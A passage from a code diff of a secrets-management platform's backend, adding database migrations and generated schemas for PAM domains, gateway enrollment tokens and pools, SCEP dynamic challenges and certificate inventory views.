knex.schema.hasTable(TableName.ResourceMetadata)) { + const hasPamDomainId = await knex.schema.hasColumn(TableName.ResourceMetadata, "pamDomainId"); + if (!hasPamDomainId) { + await knex.schema.alterTable(TableName.ResourceMetadata, (t) => { + t.uuid("pamDomainId").nullable(); + t.foreign("pamDomainId").references("id").inTable(TableName.PamDomain).onDelete("CASCADE"); + }); + } + } + + // Migrate existing AD resources to domains (preserving IDs for 
referential integrity) + const adResources = await knex(TableName.PamResource).where("resourceType", "active-directory").select("*"); + + for (const adResource of adResources) { + await knex(TableName.PamDomain).insert({ + id: adResource.id, + projectId: adResource.projectId, + name: adResource.name, + domainType: "active-directory", + gatewayId: adResource.gatewayId, + encryptedConnectionDetails: adResource.encryptedConnectionDetails, + discoveryFingerprint: adResource.discoveryFingerprint + } as any); + + await knex(TableName.PamAccount) + .where("resourceId", adResource.id) + .update({ + domainId: adResource.id, + resourceId: null + } as any); + + await knex(TableName.PamResource) + .where("adServerResourceId", adResource.id) + .update({ + domainId: adResource.id, + adServerResourceId: null + } as any); + + await knex(TableName.PamResourceRotationRule).where("resourceId", adResource.id).delete(); + await knex(TableName.PamDiscoverySourceResource).where("resourceId", adResource.id).delete(); + + await knex(TableName.ResourceMetadata) + .where("pamResourceId", adResource.id) + .update({ + pamDomainId: adResource.id, + pamResourceId: null + } as any); + + await knex(TableName.PamResource).where("id", adResource.id).delete(); + } + + // Drop adServerResourceId column from pam_resources + if (await knex.schema.hasTable(TableName.PamResource)) { + const hasAdServerResourceId = await knex.schema.hasColumn(TableName.PamResource, "adServerResourceId"); + if (hasAdServerResourceId) { + await knex.schema.alterTable(TableName.PamResource, (t) => { + t.dropColumn("adServerResourceId"); + }); + } + } +} + +export async function down(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.PamResource)) { + const hasAdServerResourceId = await knex.schema.hasColumn(TableName.PamResource, "adServerResourceId"); + if (!hasAdServerResourceId) { + await knex.schema.alterTable(TableName.PamResource, (t) => { + t.uuid("adServerResourceId").nullable(); + 
t.foreign("adServerResourceId").references("id").inTable(TableName.PamResource).onDelete("SET NULL"); + }); + } + } + + if (await knex.schema.hasTable(TableName.PamDomain)) { + const domains = await knex(TableName.PamDomain).where("domainType", "active-directory").select("*"); + + for (const domain of domains) { + await knex(TableName.PamResource).insert({ + id: domain.id, + projectId: domain.projectId, + name: domain.name, + resourceType: "active-directory", + gatewayId: domain.gatewayId, + encryptedConnectionDetails: domain.encryptedConnectionDetails, + discoveryFingerprint: domain.discoveryFingerprint + } as any); + + await knex(TableName.PamAccount) + .where("domainId", domain.id) + .update({ + resourceId: domain.id, + domainId: null + } as any); + + await knex(TableName.PamResource) + .where("domainId", domain.id) + .update({ + adServerResourceId: domain.id, + domainId: null + } as any); + + await knex(TableName.ResourceMetadata) + .where("pamDomainId", domain.id) + .update({ + pamResourceId: domain.id, + pamDomainId: null + } as any); + + await knex(TableName.PamDomain).where("id", domain.id).delete(); + } + } + + await knex.raw(`ALTER TABLE ${TableName.PamAccount} DROP CONSTRAINT IF EXISTS chk_pam_account_parent`); + + if (await knex.schema.hasTable(TableName.PamAccount)) { + const hasDomainId = await knex.schema.hasColumn(TableName.PamAccount, "domainId"); + if (hasDomainId) { + await knex.schema.alterTable(TableName.PamAccount, (t) => { + t.uuid("resourceId").notNullable().alter(); + t.dropColumn("domainId"); + }); + } + } + + if (await knex.schema.hasTable(TableName.ResourceMetadata)) { + const hasPamDomainId = await knex.schema.hasColumn(TableName.ResourceMetadata, "pamDomainId"); + if (hasPamDomainId) { + await knex.schema.alterTable(TableName.ResourceMetadata, (t) => { + t.dropColumn("pamDomainId"); + }); + } + } + + if (await knex.schema.hasTable(TableName.PamResource)) { + const hasDomainId = await knex.schema.hasColumn(TableName.PamResource, 
"domainId"); + if (hasDomainId) { + await knex.schema.alterTable(TableName.PamResource, (t) => { + t.dropColumn("domainId"); + }); + } + } + + await dropOnUpdateTrigger(knex, TableName.PamDomain); + await knex.schema.dropTableIfExists(TableName.PamDomain); +} diff --git a/backend/src/db/migrations/20260409120000_add-webhook-event-toggles.ts b/backend/src/db/migrations/20260409120000_add-webhook-event-toggles.ts new file mode 100644 index 00000000000..f6fcae82232 --- /dev/null +++ b/backend/src/db/migrations/20260409120000_add-webhook-event-toggles.ts @@ -0,0 +1,31 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; + +const FILTERED_EVENTS_COLUMN = "filteredEvents"; + +export async function up(knex: Knex): Promise { + const hasWebhookTable = await knex.schema.hasTable(TableName.Webhook); + if (!hasWebhookTable) return; + + const hasFilteredEventsColumn = await knex.schema.hasColumn(TableName.Webhook, FILTERED_EVENTS_COLUMN); + + await knex.schema.alterTable(TableName.Webhook, (table) => { + if (!hasFilteredEventsColumn) { + table.specificType(FILTERED_EVENTS_COLUMN, "text[]").nullable(); + } + }); +} + +export async function down(knex: Knex): Promise { + const hasWebhookTable = await knex.schema.hasTable(TableName.Webhook); + if (!hasWebhookTable) return; + + const hasFilteredEventsColumn = await knex.schema.hasColumn(TableName.Webhook, FILTERED_EVENTS_COLUMN); + + await knex.schema.alterTable(TableName.Webhook, (table) => { + if (hasFilteredEventsColumn) { + table.dropColumn(FILTERED_EVENTS_COLUMN); + } + }); +} diff --git a/backend/src/db/migrations/20260413000001_gateway-enrollment-tokens.ts b/backend/src/db/migrations/20260413000001_gateway-enrollment-tokens.ts new file mode 100644 index 00000000000..375a3e5a782 --- /dev/null +++ b/backend/src/db/migrations/20260413000001_gateway-enrollment-tokens.ts @@ -0,0 +1,48 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, 
dropOnUpdateTrigger } from "../utils"; + +export async function up(knex: Knex): Promise { + const hasTokenVersionColumn = await knex.schema.hasColumn(TableName.GatewayV2, "tokenVersion"); + const hasIdentityIdColumn = await knex.schema.hasColumn(TableName.GatewayV2, "identityId"); + + // Make identityId nullable and add tokenVersion to support enrollment-token-based gateways + await knex.schema.alterTable(TableName.GatewayV2, (t) => { + if (hasIdentityIdColumn) { + t.uuid("identityId").nullable().alter(); + } + if (!hasTokenVersionColumn) { + t.integer("tokenVersion").notNullable().defaultTo(0); + } + }); + + if (!(await knex.schema.hasTable(TableName.GatewayEnrollmentTokens))) { + await knex.schema.createTable(TableName.GatewayEnrollmentTokens, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + t.uuid("orgId").notNullable(); + t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE"); + t.string("tokenHash", 128).notNullable().unique(); + t.integer("ttl").notNullable().defaultTo(3600); + t.timestamp("expiresAt").notNullable(); + t.timestamp("usedAt").nullable(); + // When set, enrolling with this token updates the existing gateway instead of creating a new one + t.uuid("gatewayId").nullable(); + t.foreign("gatewayId").references("id").inTable(TableName.GatewayV2).onDelete("CASCADE"); + t.timestamps(true, true, true); + }); + + await createOnUpdateTrigger(knex, TableName.GatewayEnrollmentTokens); + } +} + +export async function down(knex: Knex): Promise { + await dropOnUpdateTrigger(knex, TableName.GatewayEnrollmentTokens); + await knex.schema.dropTableIfExists(TableName.GatewayEnrollmentTokens); + + // Restore identityId to not-null and remove tokenVersion (only safe if no null rows exist) + await knex.schema.alterTable(TableName.GatewayV2, (t) => { + t.uuid("identityId").notNullable().alter(); + t.dropColumn("tokenVersion"); + }); +} diff --git 
a/backend/src/db/migrations/20260413325231_add-scep-dynamic-challenges.ts b/backend/src/db/migrations/20260413325231_add-scep-dynamic-challenges.ts new file mode 100644 index 00000000000..64185f31ee4 --- /dev/null +++ b/backend/src/db/migrations/20260413325231_add-scep-dynamic-challenges.ts @@ -0,0 +1,63 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; + +export async function up(knex: Knex): Promise { + if (!(await knex.schema.hasTable(TableName.PkiScepDynamicChallenge))) { + await knex.schema.createTable(TableName.PkiScepDynamicChallenge, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + + t.uuid("scepConfigId").notNullable(); + t.foreign("scepConfigId").references("id").inTable(TableName.PkiScepEnrollmentConfig).onDelete("CASCADE"); + t.index("scepConfigId"); + + t.string("hashedChallenge", 64).notNullable(); + t.index("hashedChallenge"); + + t.timestamp("expiresAt").notNullable(); + t.index("expiresAt"); + + t.timestamps(true, true, true); + }); + + await createOnUpdateTrigger(knex, TableName.PkiScepDynamicChallenge); + } + + if (!(await knex.schema.hasColumn(TableName.PkiScepEnrollmentConfig, "challengeType"))) { + await knex.schema.alterTable(TableName.PkiScepEnrollmentConfig, (t) => { + t.string("challengeType", 32).notNullable().defaultTo("static"); + t.integer("dynamicChallengeExpiryMinutes").nullable(); + t.integer("dynamicChallengeMaxPending").nullable(); + }); + } + + if (await knex.schema.hasColumn(TableName.PkiScepEnrollmentConfig, "hashedChallengePassword")) { + await knex.schema.alterTable(TableName.PkiScepEnrollmentConfig, (t) => { + t.text("hashedChallengePassword").nullable().alter(); + }); + } +} + +export async function down(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.PkiScepDynamicChallenge)) { + await dropOnUpdateTrigger(knex, TableName.PkiScepDynamicChallenge); + await 
knex.schema.dropTable(TableName.PkiScepDynamicChallenge); + } + + if (await knex.schema.hasColumn(TableName.PkiScepEnrollmentConfig, "challengeType")) { + await knex.schema.alterTable(TableName.PkiScepEnrollmentConfig, (t) => { + t.dropColumn("challengeType"); + t.dropColumn("dynamicChallengeExpiryMinutes"); + t.dropColumn("dynamicChallengeMaxPending"); + }); + } + + if (await knex.schema.hasColumn(TableName.PkiScepEnrollmentConfig, "hashedChallengePassword")) { + await knex(TableName.PkiScepEnrollmentConfig).whereNull("hashedChallengePassword").delete(); + + await knex.schema.alterTable(TableName.PkiScepEnrollmentConfig, (t) => { + t.text("hashedChallengePassword").notNullable().alter(); + }); + } +} diff --git a/backend/src/db/migrations/20260414000001_add-gateway-pools.ts b/backend/src/db/migrations/20260414000001_add-gateway-pools.ts new file mode 100644 index 00000000000..7bb9797b52c --- /dev/null +++ b/backend/src/db/migrations/20260414000001_add-gateway-pools.ts @@ -0,0 +1,60 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; + +export async function up(knex: Knex): Promise { + // Create gateway_pools table + if (!(await knex.schema.hasTable(TableName.GatewayPool))) { + await knex.schema.createTable(TableName.GatewayPool, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + t.uuid("orgId").notNullable(); + t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE"); + t.string("name", 32).notNullable(); + t.timestamps(true, true, true); + t.unique(["orgId", "name"]); + }); + + await createOnUpdateTrigger(knex, TableName.GatewayPool); + } + + // Create gateway_pool_memberships join table + if (!(await knex.schema.hasTable(TableName.GatewayPoolMembership))) { + await knex.schema.createTable(TableName.GatewayPoolMembership, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + 
t.uuid("gatewayPoolId").notNullable(); + t.foreign("gatewayPoolId").references("id").inTable(TableName.GatewayPool).onDelete("CASCADE"); + t.uuid("gatewayId").notNullable(); + t.foreign("gatewayId").references("id").inTable(TableName.GatewayV2).onDelete("CASCADE"); + t.timestamps(true, true, true); + t.unique(["gatewayPoolId", "gatewayId"]); + }); + + await createOnUpdateTrigger(knex, TableName.GatewayPoolMembership); + } + + // Add gatewayPoolId to identity_kubernetes_auths + const hasGatewayPoolId = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "gatewayPoolId"); + if (!hasGatewayPoolId) { + await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (t) => { + t.uuid("gatewayPoolId").nullable(); + t.foreign("gatewayPoolId").references("id").inTable(TableName.GatewayPool).onDelete("RESTRICT"); + }); + } +} + +export async function down(knex: Knex): Promise { + // Remove gatewayPoolId from identity_kubernetes_auths + const hasGatewayPoolId = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "gatewayPoolId"); + if (hasGatewayPoolId) { + await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (t) => { + t.dropColumn("gatewayPoolId"); + }); + } + + await dropOnUpdateTrigger(knex, TableName.GatewayPoolMembership); + await knex.schema.dropTableIfExists(TableName.GatewayPoolMembership); + + await dropOnUpdateTrigger(knex, TableName.GatewayPool); + await knex.schema.dropTableIfExists(TableName.GatewayPool); +} diff --git a/backend/src/db/migrations/20260415122043_add-shared-to-certificate-inventory-views.ts b/backend/src/db/migrations/20260415122043_add-shared-to-certificate-inventory-views.ts new file mode 100644 index 00000000000..3373a9533d3 --- /dev/null +++ b/backend/src/db/migrations/20260415122043_add-shared-to-certificate-inventory-views.ts @@ -0,0 +1,47 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; + +export async function up(knex: Knex): Promise { + const hasTable = await 
knex.schema.hasTable(TableName.CertificateInventoryView); + if (!hasTable) return; + + const hasColumn = await knex.schema.hasColumn(TableName.CertificateInventoryView, "isShared"); + if (hasColumn) return; + + await knex.schema.alterTable(TableName.CertificateInventoryView, (t) => { + t.boolean("isShared").notNullable().defaultTo(false); + }); + + await knex.schema.alterTable(TableName.CertificateInventoryView, (t) => { + t.dropUnique(["projectId", "name", "createdByUserId"]); + }); + + await knex.raw( + `CREATE UNIQUE INDEX "cert_inv_view_personal_unique" ON "${TableName.CertificateInventoryView}" ("projectId", "name", "createdByUserId") WHERE "isShared" = false` + ); + + // Shared views: name must be unique per project + await knex.raw( + `CREATE UNIQUE INDEX "cert_inv_view_shared_unique" ON "${TableName.CertificateInventoryView}" ("projectId", "name") WHERE "isShared" = true` + ); +} + +export async function down(knex: Knex): Promise { + const hasTable = await knex.schema.hasTable(TableName.CertificateInventoryView); + if (!hasTable) return; + + const hasColumn = await knex.schema.hasColumn(TableName.CertificateInventoryView, "isShared"); + if (!hasColumn) return; + + await knex.raw(`DROP INDEX IF EXISTS "cert_inv_view_personal_unique"`); + await knex.raw(`DROP INDEX IF EXISTS "cert_inv_view_shared_unique"`); + + await knex.schema.alterTable(TableName.CertificateInventoryView, (t) => { + t.unique(["projectId", "name", "createdByUserId"]); + }); + + await knex.schema.alterTable(TableName.CertificateInventoryView, (t) => { + t.dropColumn("isShared"); + }); +} diff --git a/backend/src/db/migrations/20260416231234_add-external-metadata-to-certificates.ts b/backend/src/db/migrations/20260416231234_add-external-metadata-to-certificates.ts new file mode 100644 index 00000000000..568d30f90d0 --- /dev/null +++ b/backend/src/db/migrations/20260416231234_add-external-metadata-to-certificates.ts @@ -0,0 +1,24 @@ +import { Knex } from "knex"; + +import { TableName } from 
"../schemas"; + +export async function up(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.Certificate)) { + const hasColumn = await knex.schema.hasColumn(TableName.Certificate, "externalMetadata"); + if (!hasColumn) { + await knex.schema.alterTable(TableName.Certificate, (t) => { + t.jsonb("externalMetadata").nullable(); + }); + } + } +} + +export async function down(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.Certificate)) { + if (await knex.schema.hasColumn(TableName.Certificate, "externalMetadata")) { + await knex.schema.alterTable(TableName.Certificate, (t) => { + t.dropColumn("externalMetadata"); + }); + } + } +} diff --git a/backend/src/db/migrations/20260417245211_pam-session-reason.ts b/backend/src/db/migrations/20260417245211_pam-session-reason.ts new file mode 100644 index 00000000000..85c4d31f20e --- /dev/null +++ b/backend/src/db/migrations/20260417245211_pam-session-reason.ts @@ -0,0 +1,25 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; + +export async function up(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.PamSession)) { + const hasCol = await knex.schema.hasColumn(TableName.PamSession, "reason"); + if (!hasCol) { + await knex.schema.alterTable(TableName.PamSession, (t) => { + t.string("reason", 1000).nullable(); + }); + } + } +} + +export async function down(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.PamSession)) { + const hasCol = await knex.schema.hasColumn(TableName.PamSession, "reason"); + if (hasCol) { + await knex.schema.alterTable(TableName.PamSession, (t) => { + t.dropColumn("reason"); + }); + } + } +} diff --git a/backend/src/db/migrations/20260421135044_add-digicert-external-ca-columns.ts b/backend/src/db/migrations/20260421135044_add-digicert-external-ca-columns.ts new file mode 100644 index 00000000000..5df39806ccb --- /dev/null +++ b/backend/src/db/migrations/20260421135044_add-digicert-external-ca-columns.ts @@ -0,0 +1,27 @@ 
+import { Knex } from "knex"; + +import { TableName } from "../schemas"; + +export async function up(knex: Knex): Promise { + const hasCertificateRequests = await knex.schema.hasTable(TableName.CertificateRequests); + if (hasCertificateRequests) { + const hasEncryptedPrivateKey = await knex.schema.hasColumn(TableName.CertificateRequests, "encryptedPrivateKey"); + if (!hasEncryptedPrivateKey) { + await knex.schema.alterTable(TableName.CertificateRequests, (t) => { + t.binary("encryptedPrivateKey").nullable(); + }); + } + } +} + +export async function down(knex: Knex): Promise { + const hasCertificateRequests = await knex.schema.hasTable(TableName.CertificateRequests); + if (hasCertificateRequests) { + const hasEncryptedPrivateKey = await knex.schema.hasColumn(TableName.CertificateRequests, "encryptedPrivateKey"); + if (hasEncryptedPrivateKey) { + await knex.schema.alterTable(TableName.CertificateRequests, (t) => { + t.dropColumn("encryptedPrivateKey"); + }); + } + } +} diff --git a/backend/src/db/schemas/certificate-inventory-views.ts b/backend/src/db/schemas/certificate-inventory-views.ts new file mode 100644 index 00000000000..d500d35bb62 --- /dev/null +++ b/backend/src/db/schemas/certificate-inventory-views.ts @@ -0,0 +1,26 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. 
+ +import { z } from "zod"; + +import { TImmutableDBKeys } from "./models"; + +export const CertificateInventoryViewsSchema = z.object({ + id: z.string().uuid(), + projectId: z.string(), + name: z.string(), + filters: z.unknown(), + columns: z.unknown().nullable().optional(), + createdByUserId: z.string().uuid().nullable().optional(), + createdAt: z.date(), + updatedAt: z.date(), + isShared: z.boolean().default(false) +}); + +export type TCertificateInventoryViews = z.infer; +export type TCertificateInventoryViewsInsert = Omit, TImmutableDBKeys>; +export type TCertificateInventoryViewsUpdate = Partial< + Omit, TImmutableDBKeys> +>; diff --git a/backend/src/db/schemas/certificate-requests.ts b/backend/src/db/schemas/certificate-requests.ts index a1bae9640c5..b059afbd54e 100644 --- a/backend/src/db/schemas/certificate-requests.ts +++ b/backend/src/db/schemas/certificate-requests.ts @@ -5,6 +5,8 @@ import { z } from "zod"; +import { zodBuffer } from "@app/lib/zod"; + import { TImmutableDBKeys } from "./models"; export const CertificateRequestsSchema = z.object({ @@ -36,7 +38,8 @@ export const CertificateRequestsSchema = z.object({ organizationalUnit: z.string().nullable().optional(), country: z.string().nullable().optional(), state: z.string().nullable().optional(), - locality: z.string().nullable().optional() + locality: z.string().nullable().optional(), + encryptedPrivateKey: zodBuffer.nullable().optional() }); export type TCertificateRequests = z.infer; diff --git a/backend/src/db/schemas/certificates.ts b/backend/src/db/schemas/certificates.ts index 68325058faf..b69adb06017 100644 --- a/backend/src/db/schemas/certificates.ts +++ b/backend/src/db/schemas/certificates.ts @@ -44,7 +44,8 @@ export const CertificatesSchema = z.object({ isCA: z.boolean().nullable().optional(), pathLength: z.number().nullable().optional(), source: z.string().nullable().optional(), - discoveryMetadata: z.unknown().nullable().optional() + discoveryMetadata: 
z.unknown().nullable().optional(), + externalMetadata: z.unknown().nullable().optional() }); export type TCertificates = z.infer; diff --git a/backend/src/db/schemas/external-migration-configs.ts b/backend/src/db/schemas/external-migration-configs.ts new file mode 100644 index 00000000000..bd77923b225 --- /dev/null +++ b/backend/src/db/schemas/external-migration-configs.ts @@ -0,0 +1,26 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. + +import { z } from "zod"; + +import { zodBuffer } from "@app/lib/zod"; + +import { TImmutableDBKeys } from "./models"; + +export const ExternalMigrationConfigsSchema = z.object({ + id: z.string().uuid(), + orgId: z.string().uuid(), + provider: z.string(), + encryptedConfig: zodBuffer, + connectionId: z.string().uuid().nullable().optional(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TExternalMigrationConfigs = z.infer; +export type TExternalMigrationConfigsInsert = Omit, TImmutableDBKeys>; +export type TExternalMigrationConfigsUpdate = Partial< + Omit, TImmutableDBKeys> +>; diff --git a/backend/src/db/schemas/gateway-enrollment-tokens.ts b/backend/src/db/schemas/gateway-enrollment-tokens.ts new file mode 100644 index 00000000000..99cc5ebfd67 --- /dev/null +++ b/backend/src/db/schemas/gateway-enrollment-tokens.ts @@ -0,0 +1,26 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. 
+ +import { z } from "zod"; + +import { TImmutableDBKeys } from "./models"; + +export const GatewayEnrollmentTokensSchema = z.object({ + id: z.string().uuid(), + orgId: z.string().uuid(), + tokenHash: z.string(), + ttl: z.number().default(3600), + expiresAt: z.date(), + usedAt: z.date().nullable().optional(), + gatewayId: z.string().uuid().nullable().optional(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TGatewayEnrollmentTokens = z.infer; +export type TGatewayEnrollmentTokensInsert = Omit, TImmutableDBKeys>; +export type TGatewayEnrollmentTokensUpdate = Partial< + Omit, TImmutableDBKeys> +>; diff --git a/backend/src/db/schemas/gateway-pool-memberships.ts b/backend/src/db/schemas/gateway-pool-memberships.ts new file mode 100644 index 00000000000..53b636ca728 --- /dev/null +++ b/backend/src/db/schemas/gateway-pool-memberships.ts @@ -0,0 +1,22 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. + +import { z } from "zod"; + +import { TImmutableDBKeys } from "./models"; + +export const GatewayPoolMembershipsSchema = z.object({ + id: z.string().uuid(), + gatewayPoolId: z.string().uuid(), + gatewayId: z.string().uuid(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TGatewayPoolMemberships = z.infer; +export type TGatewayPoolMembershipsInsert = Omit, TImmutableDBKeys>; +export type TGatewayPoolMembershipsUpdate = Partial< + Omit, TImmutableDBKeys> +>; diff --git a/backend/src/db/schemas/gateway-pools.ts b/backend/src/db/schemas/gateway-pools.ts new file mode 100644 index 00000000000..8da7e271a5e --- /dev/null +++ b/backend/src/db/schemas/gateway-pools.ts @@ -0,0 +1,20 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. 
+ +import { z } from "zod"; + +import { TImmutableDBKeys } from "./models"; + +export const GatewayPoolsSchema = z.object({ + id: z.string().uuid(), + orgId: z.string().uuid(), + name: z.string(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TGatewayPools = z.infer; +export type TGatewayPoolsInsert = Omit, TImmutableDBKeys>; +export type TGatewayPoolsUpdate = Partial, TImmutableDBKeys>>; diff --git a/backend/src/db/schemas/gateways-v2.ts b/backend/src/db/schemas/gateways-v2.ts index a133fa2acec..aa286fe5875 100644 --- a/backend/src/db/schemas/gateways-v2.ts +++ b/backend/src/db/schemas/gateways-v2.ts @@ -14,13 +14,14 @@ export const GatewaysV2Schema = z.object({ createdAt: z.date(), updatedAt: z.date(), orgId: z.string().uuid(), - identityId: z.string().uuid(), + identityId: z.string().uuid().nullable().optional(), relayId: z.string().uuid().nullable().optional(), name: z.string(), heartbeat: z.date().nullable().optional(), encryptedPamSessionKey: zodBuffer.nullable().optional(), healthAlertedAt: z.date().nullable().optional(), - lastHealthCheckStatus: z.string().nullable().optional() + lastHealthCheckStatus: z.string().nullable().optional(), + tokenVersion: z.number().default(0) }); export type TGatewaysV2 = z.infer; diff --git a/backend/src/db/schemas/identity-kubernetes-auths.ts b/backend/src/db/schemas/identity-kubernetes-auths.ts index 4789ef36593..e9cfe9c4b04 100644 --- a/backend/src/db/schemas/identity-kubernetes-auths.ts +++ b/backend/src/db/schemas/identity-kubernetes-auths.ts @@ -33,7 +33,8 @@ export const IdentityKubernetesAuthsSchema = z.object({ gatewayId: z.string().uuid().nullable().optional(), accessTokenPeriod: z.coerce.number().default(0), tokenReviewMode: z.string().default("api"), - gatewayV2Id: z.string().uuid().nullable().optional() + gatewayV2Id: z.string().uuid().nullable().optional(), + gatewayPoolId: z.string().uuid().nullable().optional() }); export type TIdentityKubernetesAuths = z.infer; diff --git 
a/backend/src/db/schemas/index.ts b/backend/src/db/schemas/index.ts index 448b992de4a..8ac69fffb7e 100644 --- a/backend/src/db/schemas/index.ts +++ b/backend/src/db/schemas/index.ts @@ -11,7 +11,6 @@ export * from "./ai-mcp-endpoints"; export * from "./ai-mcp-server-tools"; export * from "./ai-mcp-server-user-credentials"; export * from "./ai-mcp-servers"; -export * from "./api-keys"; export * from "./app-connection-credential-rotations"; export * from "./app-connections"; export * from "./approval-policies"; @@ -34,6 +33,7 @@ export * from "./certificate-authority-crl"; export * from "./certificate-authority-secret"; export * from "./certificate-bodies"; export * from "./certificate-cleanup-configs"; +export * from "./certificate-inventory-views"; export * from "./certificate-requests"; export * from "./certificate-secrets"; export * from "./certificate-syncs"; @@ -46,12 +46,16 @@ export * from "./email-domains"; export * from "./external-certificate-authorities"; export * from "./external-group-org-role-mappings"; export * from "./external-kms"; +export * from "./external-migration-configs"; export * from "./folder-checkpoint-resources"; export * from "./folder-checkpoints"; export * from "./folder-commit-changes"; export * from "./folder-commits"; export * from "./folder-tree-checkpoint-resources"; export * from "./folder-tree-checkpoints"; +export * from "./gateway-enrollment-tokens"; +export * from "./gateway-pool-memberships"; +export * from "./gateway-pools"; export * from "./gateways"; export * from "./gateways-v2"; export * from "./git-app-install-sessions"; @@ -118,6 +122,7 @@ export * from "./pam-discovery-source-dependencies"; export * from "./pam-discovery-source-resources"; export * from "./pam-discovery-source-runs"; export * from "./pam-discovery-sources"; +export * from "./pam-domains"; export * from "./pam-folders"; export * from "./pam-resource-favorites"; export * from "./pam-resource-rotation-rules"; @@ -147,6 +152,7 @@ export * from 
"./pki-discovery-configs"; export * from "./pki-discovery-installations"; export * from "./pki-discovery-scan-history"; export * from "./pki-est-enrollment-configs"; +export * from "./pki-scep-dynamic-challenges"; export * from "./pki-scep-enrollment-configs"; export * from "./pki-scep-transactions"; export * from "./pki-signers"; @@ -191,10 +197,7 @@ export * from "./secret-folders"; export * from "./secret-imports"; export * from "./secret-references"; export * from "./secret-references-v2"; -export * from "./secret-rotation-output-v2"; -export * from "./secret-rotation-outputs"; export * from "./secret-rotation-v2-secret-mappings"; -export * from "./secret-rotations"; export * from "./secret-rotations-v2"; export * from "./secret-scanning-configs"; export * from "./secret-scanning-data-sources"; diff --git a/backend/src/db/schemas/models.ts b/backend/src/db/schemas/models.ts index 898a347a45c..5eec2ab6be8 100644 --- a/backend/src/db/schemas/models.ts +++ b/backend/src/db/schemas/models.ts @@ -33,6 +33,7 @@ export enum TableName { PkiAcmeEnrollmentConfig = "pki_acme_enrollment_configs", PkiScepEnrollmentConfig = "pki_scep_enrollment_configs", PkiScepTransaction = "pki_scep_transactions", + PkiScepDynamicChallenge = "pki_scep_dynamic_challenges", PkiSubscriber = "pki_subscribers", PkiAlert = "pki_alerts", PkiAlertsV2 = "pki_alerts_v2", @@ -60,7 +61,6 @@ export enum TableName { UserAction = "user_actions", SuperAdmin = "super_admin", RateLimit = "rate_limit", - ApiKey = "api_keys", ProjectSshConfig = "project_ssh_configs", Project = "projects", ProjectBot = "project_bots", @@ -130,8 +130,6 @@ export enum TableName { SecretApprovalRequestSecret = "secret_approval_requests_secrets", SecretApprovalRequestSecretTag = "secret_approval_request_secret_tags", SecretApprovalPolicyEnvironment = "secret_approval_policies_environments", - SecretRotation = "secret_rotations", - SecretRotationOutput = "secret_rotation_outputs", SamlConfig = "saml_configs", LdapConfig = 
"ldap_configs", OidcConfig = "oidc_configs", @@ -162,7 +160,6 @@ export enum TableName { JnSecretTag = "secret_tag_junction", SecretVersionTag = "secret_version_tag_junction", SecretVersionV2Tag = "secret_version_v2_tag_junction", - SecretRotationOutputV2 = "secret_rotation_output_v2", // KMS Service KmsServerRootConfig = "kms_root_config", KmsKey = "kms_keys", @@ -220,6 +217,9 @@ export enum TableName { OrgGatewayConfigV2 = "org_gateway_config_v2", Relay = "relays", GatewayV2 = "gateways_v2", + GatewayEnrollmentTokens = "gateway_enrollment_tokens", + GatewayPool = "gateway_pools", + GatewayPoolMembership = "gateway_pool_memberships", KeyValueStore = "key_value_store", @@ -237,9 +237,11 @@ export enum TableName { PamAccountDependency = "pam_account_dependencies", PamResourceRotationRule = "pam_resource_rotation_rules", PamResourceFavorite = "pam_resource_favorites", + PamDomain = "pam_domains", PamAccountPolicy = "pam_account_policies", VaultExternalMigrationConfig = "vault_external_migration_configs", + ExternalMigrationConfig = "external_migration_configs", // PKI ACME PkiAcmeAccount = "pki_acme_accounts", @@ -258,6 +260,9 @@ export enum TableName { // PKI Cleanup CertificateCleanupConfig = "certificate_cleanup_configs", + // PKI Inventory Views + CertificateInventoryView = "certificate_inventory_views", + // AI AiMcpServer = "ai_mcp_servers", AiMcpServerTool = "ai_mcp_server_tools", @@ -281,11 +286,15 @@ export enum TableName { PkiSigners = "pki_signers", PkiSigningOperations = "pki_signing_operations", + CaSigningConfig = "ca_signing_configs", + SecretValidationRule = "secret_validation_rules", + // Deprecated - Not used anymore now that Redis is persistent DeprecatedDurableQueueJobs = "queue_jobs", - - CaSigningConfig = "ca_signing_configs", - SecretValidationRule = "secret_validation_rules" + DeprecatedSecretRotationV1 = "secret_rotations", + DeprecatedSecretRotationOutput = 